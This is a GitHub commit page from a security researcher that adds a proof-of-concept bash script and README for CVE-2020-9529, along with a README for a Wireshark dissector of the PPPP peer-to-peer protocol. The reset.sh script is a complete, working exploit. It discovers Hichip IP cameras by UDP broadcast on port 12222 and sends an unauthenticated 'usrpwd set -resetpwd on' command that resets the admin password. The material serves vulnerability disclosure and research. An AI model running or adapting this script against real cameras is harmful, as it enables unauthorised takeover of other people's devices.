Skip to content

Commit

Permalink
added p2p dissector and hichip pw reset script
Browse files Browse the repository at this point in the history
  • Loading branch information
@pmarrapese
pmarrapese committed Aug 1, 2020
0 parents commit 37a6d7c
Show file tree
Hide file tree
Showing 5 changed files with 696 additions and 0 deletions.
11 changes: 11 additions & 0 deletions exploits/cve-2020-9529/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# Hichip IP Camera Admin Password Reset

PoC for [CVE-2020-9529](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9529) to locally reset the password of cameras manufactured by Shenzhen Hichip Vision Technology.

## Prerequisites

Requires `socat`

## Usage

Invoke with `./reset.sh` and enter target device IP (or press enter for autodiscovery)
41 changes: 41 additions & 0 deletions exploits/cve-2020-9529/reset.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
#!/bin/bash
#
# Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>
# All rights reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
# SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.

pw_reset() {
echo [*] Searching for device...
dev_ip=${1:-'255.255.255.255'}
response=$(echo -ne 'SEARCH * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\n\r\n' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r')
dev_id=$(echo "$response" | grep Device-ID= | cut -d = -f 2)
dev_ip=$(echo "$response" | grep IP= | cut -d = -f 2)
#echo "$response"

if [[ -z $dev_id ]]; then
echo [*] No device found.
exit 1
fi

echo [*] Resetting admin password of device at $dev_ip...
response=$(echo -ne 'CMD * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\nDevice-ID:'$dev_id'\r\nContent-Length:23\r\n\r\nusrpwd set -resetpwd on' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r')
if [[ -z $response ]]; then
echo [*] No response received, device may not be vulnerable.
exit 1
fi

echo [*] Response received!
echo "$response"
}

echo '[*] Hichip IP Camera Admin Password Reset (CVE-2020-9529)'
echo '[*] Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>'
echo -n 'Enter device IP (or press enter for autodiscovery): '
read dev_ip
pw_reset $dev_ip
11 changes: 11 additions & 0 deletions p2p/dissector/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
# P2P Wireshark Dissector

Dissector for the "PPPP" protocol, as used by CS2 Network P2P and Shenzhen Yunni iLnkP2P.

## Installation

1. Download the appropriate version of the [Wireshark Generic Dissector](http://wsgd.free.fr/download.html) plugin for your version of Wireshark
2. Copy `generic.dll` to the desired plugin directory
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g. `C:\Users\<username>\AppData\Roaming\Wireshark\plugins\3.2\epan`)
3. Copy `pppp.wsgd` (protocol file) and `pppp.fdesc` (data format description file) to the desired directory
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g., `C:\Users\<username>\AppData\Roaming\Wireshark\profiles`)
Loading

0 comments on commit 37a6d7c

Please sign in to comment.